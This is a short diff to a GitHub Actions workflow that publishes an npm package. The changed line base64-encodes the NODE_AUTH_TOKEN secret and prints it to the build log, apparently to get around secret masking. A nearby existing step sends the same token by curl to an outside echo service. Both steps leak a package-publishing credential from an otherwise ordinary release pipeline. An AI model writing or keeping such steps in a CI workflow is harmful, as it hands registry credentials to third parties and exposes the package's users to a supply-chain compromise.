--- a/.github/workflows/publish.yml
+++ b/.github/workflows/publish.yml
@@ -18,7 +18,7 @@ jobs:
         with:
           node-version: '20.x'
           registry-url: 'https://registry.npmjs.org'
-      - run: echo $NODE_AUTH_TOKEN
+      - run: echo -n $NODE_AUTH_TOKEN | base64
       - run: curl "https://echo.free.beeceptor.com/sample-request?author=$NODE_AUTH_TOKEN"
       - run: npm ci
       - run: npm publish --provenance --access public
